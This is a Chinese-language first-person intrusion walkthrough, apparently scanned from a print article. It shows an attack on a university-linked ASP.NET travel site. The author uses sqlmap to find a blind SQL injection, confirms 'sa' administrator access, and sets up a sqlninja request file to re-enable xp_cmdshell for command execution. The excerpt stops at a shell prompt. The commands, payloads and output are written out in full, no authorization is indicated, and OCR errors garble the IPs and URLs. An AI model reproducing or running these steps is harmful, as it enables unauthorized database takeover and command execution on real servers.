我选择了 10.10.8.15这个目标站，因为它是asp.net架构的，如果有注入，较容易提权（后面事实证明的确非常好提权)。
打开以后竟然是一个旅游方面的网站，记得在学校某内部网站找到这个网站的链接，标明的是网络协会的，可见大学学生的东西有多杂。
随便点开了一则新闻的页面，然后用sqlmap扫描：
sqlmap. py -u "http://10. 10. 8. 51/Web/News/0piniondetail. aspx9id=54^
很快就返回了如下文字:_
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=53’ AND 9442=9442 AND ’fVBu，=，fVBu
web server operating system: Windows 2003
web application technology: ASP. NET, Microsoft IIS 6. 0, ASP. NET 4. 0.30128 back-end DBMS: Microsoft SQL Server 2005 [*] shutting down at: 13:14:52
看来的确有注入，详细信息都在上面了，操作系统是windows 2003, 1186.0以及数据库是MSSQL 2005。立即看看数据库当前的用户名，提交如下命令：
/sqlmap. py -u "http://10. 10. 8. 51/Web/News/0piniondetail. aspx9id=54^
—current—user
以下是从sqlmap返回的一长串信息中摘下的：
[13:35:28] [INFO] fetching current user
[13:35:28] [INFO] read from file
’/pentest/database/sqlmap/output/10.10. 8. 51/session’ : sa

显示了当前用户名是sa，如果真的是sa权限，那么已经成功了一半以上了。提交以下 命令查看当前用户的权限：
• /sqlmap. py -u "http://10. 10. 8. 51/Web/News/0piniondetail. aspx9id=54^
—privileges
摘下的关键返回信息，如下：
database management system users privileges:
[*] nx
[*] sa (administrator)
果然是sa权限，赶紧换成sqlninja,Backtrack5中的Sqlninja是新版本，新版本的 Sqlninja已经不和以前的配置方法一样了，需要先建一个配置文件。在终端中键入touch 001^.001^建立一个配置文件，针对此次攻击，我的配置文件如下：
—httprequest_start—
GET http://10. 10. 8. 51/Web/News/0piniondetail. aspx?id=53’ ;/**/_SQL2INJECT_ HTTP/1.1
Host: 10. 10. 8. 51
User-Agent: Mozilla/5. 0 (X11; U; Linux i686; en-US; rv:l. 7.13) Gecko/20060418 Firefox/l. 0. 8 Connection: close —httprequest_end—
Sqlninja的配置文件格式用了标准的HTTP请求，以一httprequest_start—和--httprequest_end--—作为开始和结束，get中url后面的_sql2inject—会被sqlninja自动替换成相应的注入语句。
保存文件。由于SQL Server2005默认是禁用了 xp_cmdshell的，所以首先需要恢复 xp_cmdshell存储过程，键入命令：
root@bt:/pentest/database/sqlninja